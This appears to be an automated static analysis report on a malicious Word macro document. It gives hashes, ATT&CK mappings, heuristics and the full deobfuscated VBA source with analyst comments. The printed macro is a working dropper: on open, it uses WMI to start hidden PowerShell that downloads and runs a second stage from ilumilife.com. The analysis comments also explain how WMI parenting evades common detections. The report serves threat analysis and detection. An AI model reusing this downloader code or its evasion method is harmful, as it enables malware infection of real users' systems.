Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 45ba4ab6b5fce705…

MALICIOUS

Office (OLE)

68.0 KB Created: 2016-05-22 23:26:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: abf17e14d51e2c3118ac0821af4304b1 SHA-1: f1f9ded09384bcf8dbad412897d007201fa67c54 SHA-256: 45ba4ab6b5fce70576b1a0a3c7ec360a54b360e2a0b2495a38508523b2b55258
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1047 Windows Management Instrumentation T1059.001 PowerShell T1105 Ingress Tool Transfer T1027 Obfuscated Files or Information

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The document body explicitly prompts the user to 'Enable Content', indicating a social engineering lure to bypass macro security. Document_Open calls eNpLPBK.JyigaHV, which runs vWxaMGOEc; that routine is the actual launcher. Its two GetObject calls bind the WMI monikers winmgmts:\\.\root\cimv2:Win32_ProcessStartup and winmgmts:\\.\root\cimv2:Win32_Process (every string in the macro is stored with junk characters interleaved and is recovered at runtime by buPQt.MPKvxO, which simply deletes each character of a per-call key from the encoded string), set ShowWindow = 0 so the child window is hidden, and call Win32_Process.Create with a decoded command line of the form: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $filename=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('hxxp://ilumilife[.]com/system/cache/content.bin', $filename);(New-Object -com WScript.Shell).Exec($filename). In other words the macro downloads a second-stage binary into the user's temp directory and executes it. Because the process is created through WMI rather than Shell/WScript.Shell, the PowerShell process is typically parented by WmiPrvSE.exe rather than WINWORD.EXE, so detections that key solely on Office spawning powershell.exe are likely to miss this chain; the On Error GoTo handler around the launcher also discards any failure silently, so a blocked download produces no visible error. The remaining procedures in the module (hONWoyHtJF, OutShNcjQN, cGDVzxiwlz, AIxhJG) are never called and reference identifiers that do not exist in the extracted source; they appear to be padding inserted to dilute static scanning.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Note that every URL listed below is a standard XML/XMP namespace identifier carried in document metadata (w3.org, ns.adobe.com, schemas.openxmlformats.org), not attacker infrastructure; the download URL this sample actually contacts is stored only in obfuscated form inside the macro and is recovered by decoding the CRNeke function in the extracted artifact.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# — In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography — In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3736 bytes
SHA-256: bdba64f3d3be7a0a6c882b8aa6aa4bbd57754ba773958e4206e6b24cac614fd6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-exec entry point: runs as soon as the document is opened (once the user
' accepts the "Enable Content" prompt the lure text asks for). The only work
' done here is a call into module eNpLPBK; its JyigaHV sub starts the payload
' chain that ends in vWxaMGOEc.
Private Sub Document_Open()
eNpLPBK.JyigaHV
End Sub
' Not called from anywhere in the extracted source. The three bare identifiers
' in the body (uhwkpvP, aJHMA, XwNrbCWptY) are not defined in this listing, so
' this looks like junk/padding code added to dilute the module for scanners.
' Both parameters are ignored; the function always returns True.
Private Function hONWoyHtJF(ByVal oZAPR As String, ByVal KHPsH As String) As Boolean
uhwkpvP
aJHMA
XwNrbCWptY
hONWoyHtJF = True
End Function
' Not called from anywhere in the extracted source; ULWoe is not defined in this
' listing. Looks like padding code. Always returns the constant 7748.
Private Function OutShNcjQN() As Integer
ULWoe
OutShNcjQN = 7748
End Function
' Not called from anywhere in the extracted source. None of okPmXdV, jMVqcklQ,
' GyRIm, BjHWq, EgeZkSpucE or UfhMtyhcr is defined in this listing, and the
' string literals passed here are never used by the decoder (buPQt.MPKvxO).
' Appears to be padding code; both parameters are ignored.
Private Sub cGDVzxiwlz(ByVal YaNHe As Integer, ByVal DoMqeobP As Boolean)
okPmXdV
If jMVqcklQ Then
GyRIm
BjHWq True, "L4kdqe74xqC9fmMVfEQfGNw66", "hwdyJWJdx8dfaLtRDeZGVpXW8"
EgeZkSpucE 8396, "GwLRX20u9gYLsyx598HLIts", "oxmWNQa6S2VQPjipeZODR"
End If
UfhMtyhcr
End Sub

Attribute VB_Name = "buPQt"
' One step of the string decoder: decides whether a single character survives.
'   mSwRnM   - the character being examined (one char, from jluBD.nHmPIUC)
'   LhGeCdXc - the "key": the set of junk characters to strip
' Returns mSwRnM unchanged when it does NOT occur in the key
' (jluBD.ykUFRRIR is an InStr wrapper); otherwise the result is never assigned,
' so VBA returns "" and the character is dropped. The assignment to JDljNcAdm is
' dead, and the declared locals haxBMHgJ / zBVRmsd are unused.
Private Function OREYBmIPS(ByVal mSwRnM As String, ByVal LhGeCdXc As String) As String
Dim haxBMHgJ As Integer, zBVRmsd As Integer
If Not jluBD.ykUFRRIR(LhGeCdXc, mSwRnM) Then
OREYBmIPS = mSwRnM
JDljNcAdm = "2O8SlNund9Vb6PIcA"
End If
End Function
' The string decoder used by every obfuscated literal in module eNpLPBK.
'   ovXYB      - key: the junk characters that were interleaved into the string
'   NSulZwdvrR - the obfuscated string
' Walks NSulZwdvrR one character at a time (1-based, VrYUurrBOs returns 1,
' jluBD.VdJsf is Len) and appends each character to the result unless it
' appears in the key (OREYBmIPS returns "" in that case, jluBD.bQKIhcbOi is &).
' Net effect: every character of the key is deleted from the input, which is all
' the "encryption" this sample uses. The assignment to SdkmT is dead.
' NOTE(review): the membership test is InStr with the default compare mode, so
' it is case-sensitive unless the module has Option Compare Text, which is not
' visible in this extract.
Public Function MPKvxO(ByVal ovXYB As String, ByVal NSulZwdvrR As String) As String
For kIGNoWxfk = VrYUurrBOs To jluBD.VdJsf(NSulZwdvrR)
SdkmT = 7401
MPKvxO = jluBD.bQKIhcbOi(MPKvxO, OREYBmIPS(jluBD.nHmPIUC(NSulZwdvrR, kIGNoWxfk), ovXYB))
Next
End Function
' Returns 1: the starting index for the decoder loop in MPKvxO (VBA Mid() is
' 1-based). Hidden behind a function call purely to obscure the loop bounds.
Private Function VrYUurrBOs() As Integer
VrYUurrBOs = 1
End Function

Attribute VB_Name = "eNpLPBK"
' Decodes (by stripping the key characters y j f G h E B) to the WMI moniker
'   winmgmts:\\.\root\cimv2:Win32_Process
' which vWxaMGOEc passes to GetObject to obtain the Win32_Process class.
Private Function AcRcm() As String
AcRcm = buPQt.MPKvxO("yjfGhEB", "wBBihnmEgjGmtBEs:Ef\j\B.\fryGooBjty\Gchiymvy2B:jWGyiBn3G2jf_BPrEoycfejsBsy")
End Function
' The launcher. Creates a hidden process via WMI (Win32_Process.Create) instead
' of Shell()/WScript.Shell, which changes the process lineage seen by EDR
' (the child is typically parented by the WMI provider host, not WINWORD.EXE).
' Any error at any step jumps to the empty XETnMxk label, so failures (e.g. a
' blocked download) are swallowed without a user-visible message.
' The declared locals GZWNZLS / YfKDxAJ are unused; the assignments to WSwTE and
' UTGpOWiqqf are dead and exist only as noise.
Private Sub vWxaMGOEc()
Dim GZWNZLS As Boolean, YfKDxAJ As Integer
On Error GoTo XETnMxk
' GIjNz decodes to winmgmts:\\.\root\cimv2:Win32_ProcessStartup.
Set DqFkEHV = GetObject(GIjNz)
' New Win32_ProcessStartup instance; ShowWindow = 0 (SW_HIDE) hides the window.
Set iToZIefQ = DqFkEHV.SpawnInstance_
iToZIefQ.ShowWindow = 0
WSwTE = False
' AcRcm decodes to winmgmts:\\.\root\cimv2:Win32_Process.
Set kdUANwTNo = GetObject(AcRcm)
' Win32_Process.Create(CommandLine, CurrentDirectory, ProcessStartupInformation):
' CRNeke is the decoded powershell.exe download-and-execute command line.
kdUANwTNo.Create CRNeke, Null, iToZIefQ
UTGpOWiqqf = False
Exit Sub
XETnMxk:
End Sub
' Decodes (by stripping the key characters A B D Z Y 6) to the WMI moniker
'   winmgmts:\\.\root\cimv2:Win32_ProcessStartup
' used by vWxaMGOEc to build the hidden-window startup info. The assignment to
' NdjPKQnCr is dead noise.
Private Function GIjNz() As String
NdjPKQnCr = "25iL0Eq6DPSGQNEWgkOrYm5zlu3TUCw"
GIjNz = buPQt.MPKvxO("ABDZY6", "BwZinZmBAgmDtBsYA:Z\\6.Z\ArBoZoZYt\DcDiYZmv6B26:WAYiYn36Y2_BDPZroZAcAesDYsSAZtAar66t6upY")
End Function
' Decodes (by stripping the key characters R 7 3 g 0 6 M U Z) to the command
' line handed to Win32_Process.Create. Recovered value (URL defanged):
'   powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command
'     $filename=[System.IO.Path]::GetTempFileName();
'     (New-Object System.Net.WebClient).DownloadFile(
'         'hxxp://ilumilife[.]com/system/cache/content.bin', $filename);
'     (New-Object -com WScript.Shell).Exec($filename)
' i.e. fetch a second stage into a .tmp file in the user's temp directory and
' run it. Indicators for hunting: the host ilumilife[.]com, the path
' /system/cache/content.bin, and a hidden powershell.exe with
' -ExecutionPolicy Bypass spawned via WMI.
Private Function CRNeke() As String
CRNeke = buPQt.MPKvxO("R73g06MUZ", "pgo03wUer77shZeMlRRl0.eZxUgeR R-ERxReMcUZut6i03oZn3Po70liZcU0y7 BgyM7paZMs3s 3-0W3Uin3dZo7wg0SRtZylZeZ7 HZMid0d3UeMn3 M-gco3mRRm7a6nd6 U7$ZfiRl3Ue7na7m77eZ=[ZS3y6sMZt6eRm.6I6ZO.30Pgat60h]M:60:gGe3tR3TeZgmp7FggigleZNUgaRmeg(6)U;3(Z0NUe0w3-OMUbUjeMc6t3 URSyZ3stMeUZmg.3Nget0.3RWReRbCRlZi3e7Zn0t)3.ZRD0o6wnRMl0oa6dRFMRilZeR7('R0hMttZpg:M/Z3/6i7lu0gmi06l7i0fUeR.cZRomgM/RsyMs7Zte77m3/cgRacM7hge/Mc7o0nUtU3en7tg0.bg7i6nU',Z0 3$fg7ilUeUn0a3gm3e)Z3;U(Nge30w-ROZbgjMeMZcZtM -Uc6oU6m6 7WUSMc3r3ipZtg.U6S7hReRll3U).gER7xRecR(06$MfMil7RenRa0mUZeg)")
End Function
' Public entry point called from ThisDocument.Document_Open. Its only real work
' is the call to vWxaMGOEc (the WMI launcher); the local OpQzKuzWBa is unused
' and the assignment to LPSXJ is dead noise.
Public Sub JyigaHV()
Dim OpQzKuzWBa As Integer
LPSXJ = "lUjcFsqGSu2gqdSdfceVUq2DF2NB"
vWxaMGOEc
End Sub

Attribute VB_Name = "jluBD"
' Thin wrapper around Len(): returns the character count of dWoIc. Used as the
' loop upper bound in buPQt.MPKvxO. The local iOKwyOJ is unused.
Public Function VdJsf(ByVal dWoIc As String) As Integer
Dim iOKwyOJ As Integer
VdJsf = Len(dWoIc)
End Function
' Not called from anywhere in the extracted source; neither CJNrbvYowi nor DGCeV
' is defined in this listing. Appears to be padding code; the string arguments
' are random-looking filler and are never decoded.
Private Sub AIxhJG(ByVal vdCxrC As Integer, ByVal dZJIp As Integer)
CJNrbvYowi "ExaVsM33QZiVP4sgnqk7upWMplR7chc9A"
DGCeV "eRWYamBMQVx7UqZzqXWfS6tZ1409HWoi"
End Sub
' Thin wrapper around Mid(): returns the single character of fiXeY at 1-based
' position IphFNKuX. Used by buPQt.MPKvxO to walk the obfuscated string.
Public Function nHmPIUC(ByVal fiXeY As String, ByVal IphFNKuX As Integer) As String
nHmPIUC = Mid(fiXeY, IphFNKuX, 1)
End Function
' Thin wrapper around string concatenation: returns BjXGuLv & qpQmcZF. Used by
' buPQt.MPKvxO to accumulate the decoded output. The local Qtdyc is unused and
' the assignment to GkfqvYfaDz is dead noise.
Public Function bQKIhcbOi(ByVal BjXGuLv As String, ByVal qpQmcZF As String) As String
Dim Qtdyc As String
GkfqvYfaDz = 5351
bQKIhcbOi = BjXGuLv & qpQmcZF
End Function
' Substring test: True when hvXPHlFYsd occurs anywhere in OwSUwAz
' (InStr returns 0 when not found). buPQt.OREYBmIPS calls it with the key as
' OwSUwAz and a single character as hvXPHlFYsd to decide whether to drop that
' character. The local ZpVkKar is unused.
Public Function ykUFRRIR(ByVal OwSUwAz As String, ByVal hvXPHlFYsd As String) As Boolean
Dim ZpVkKar As String
ykUFRRIR = InStr(1, OwSUwAz, hvXPHlFYsd) <> 0
End Function